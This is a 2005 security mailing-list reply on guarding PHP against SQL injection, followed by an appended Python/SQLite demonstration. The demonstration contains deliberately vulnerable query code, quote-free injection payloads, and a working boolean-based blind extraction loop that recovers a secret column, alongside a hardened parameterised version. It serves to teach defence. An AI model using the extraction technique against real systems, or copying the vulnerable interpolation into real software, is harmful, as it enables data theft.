WebApp Sec mailing list archives

RE: Blind SQL Injection / Stored procedures


From: "LAROUCHE Francois" <Francois.Larouche () accorservices com>
Date: Fri, 18 Nov 2005 11:55:00 +0100


Hi Phillip,

The first thing I can tell you about PHP, since I don't know much about it, is the use of the magic quotes option. You should 
find valuable information on this topic on Google. However, you have to know that there are some problems with it. Read it 
carefully.

Now the problem with PHP is that under version 5 (not 100% sure) there is nothing that prevents SQL injection, since the 
SQL is inline in the code. Even with magic quotes it's dangerous, since you can achieve SQL injection without a single quote 
(when there is an integer argument, for instance).

Another option I found is a database abstraction layer package made by PEAR; it works on PHP 4 and 5 and should be free 
(pear.php.net/package/DB). Now I don't know if it's a good product or not, or really secure, but you can always try. I just 
know they use their own prepared statements and quote stripping.

Good luck!

François Larouche

P.S. It's not a good idea to talk openly about your architecture on the net; not all people on this list are pure of heart 
:) NASA is an attractive place...
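
The integer-argument case mentioned above, as an added example that is not part of the original message or of any PEAR code. Python with an in-memory SQLite database stands in for PHP/MySQL so the script runs offline: escape_quotes emulates what magic quotes does (it only ever touches quote characters, using SQLite's doubled-quote rule instead of MySQL's backslash), the users table and its secrets are constructed sample data, and the function names are my own. It shows that the escaping does defeat the classic quoted payload in a string context, that a quote-free payload sails through an integer context, that a boolean-based blind attack can pull a column out through that same integer parameter without a single quote, and that type-checking plus parameter binding closes the hole.

```python
"""Magic-quotes-style escaping vs. an integer-context injection (added example)."""
import sqlite3


def escape_quotes(value: str) -> str:
    """Quote escaping in the spirit of PHP's magic_quotes_gpc / addslashes().

    addslashes() backslash-escapes quotes for MySQL; SQLite, used here so the
    example runs offline, escapes a quote by doubling it. Either way the
    transform only touches quote characters and leaves everything else alone.
    """
    return value.replace("'", "''")


def setup() -> sqlite3.Connection:
    """Constructed sample table: three users, each with a secret column."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, secret TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "s3cr3t"), (2, "bob", "hunter2"), (3, "carol", "letmein")],
    )
    return conn


def lookup_by_name_vuln(conn, raw_name: str):
    """String context: the value sits inside quotes, so escaping the quotes in
    the input keeps the classic ' OR '1'='1 payload inside the literal."""
    sql = "SELECT id FROM users WHERE name = '%s'" % escape_quotes(raw_name)
    return [row[0] for row in conn.execute(sql)]


def lookup_by_id_vuln(conn, raw_id: str):
    """Integer context: the value is interpolated unquoted, so quote escaping
    is irrelevant and any quote-free payload lands straight in the query."""
    sql = "SELECT id FROM users WHERE id = %s" % escape_quotes(raw_id)
    return [row[0] for row in conn.execute(sql)]


def lookup_by_id_safe(conn, raw_id: str):
    """Hardened form: reject anything that is not an integer, then bind the
    value as a parameter instead of building the statement by hand."""
    user_id = int(raw_id)  # raises ValueError on "1 OR 1=1"
    return [row[0] for row in conn.execute("SELECT id FROM users WHERE id = ?", (user_id,))]


def blind_extract_secret(conn, row_id: int, max_len: int = 16) -> str:
    """Boolean-based blind extraction through lookup_by_id_vuln.

    No quote character is ever sent: each guess compares
    unicode(substr(secret, pos, 1)) against an integer code point, and the
    presence or absence of a result row is the one-bit oracle. When substr()
    runs past the end of the string, unicode('') is NULL, nothing matches,
    and the loop stops.
    """
    recovered = ""
    for pos in range(1, max_len + 1):
        found = None
        for code in range(32, 127):  # printable ASCII
            payload = "%d AND unicode(substr(secret,%d,1))=%d" % (row_id, pos, code)
            if lookup_by_id_vuln(conn, payload):  # row came back: guess was right
                found = chr(code)
                break
        if found is None:
            break
        recovered += found
    return recovered


if __name__ == "__main__":
    db = setup()
    print("string context, quoted payload :", lookup_by_name_vuln(db, "' OR '1'='1"))
    print("integer context, 1 OR 1=1      :", lookup_by_id_vuln(db, "1 OR 1=1"))
    print("blind extraction of bob's secret:", blind_extract_secret(db, 2))
    print("hardened lookup, id 2          :", lookup_by_id_safe(db, "2"))
    try:
        lookup_by_id_safe(db, "1 OR 1=1")
    except ValueError as exc:
        print("hardened lookup rejects payload:", exc)
```

The blind loop is deliberately naive (one round trip per candidate byte) to keep the oracle visible; the point is that every payload it sends is a valid quote-free expression, so magic quotes never gets a chance to touch it. The hardened lookup does two independent things, and both matter: the int() cast is the input-validation step that belongs on any identifier parameter, and the ? placeholder is the prepared-statement step that keeps data out of the SQL grammar even when validation is forgotten.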

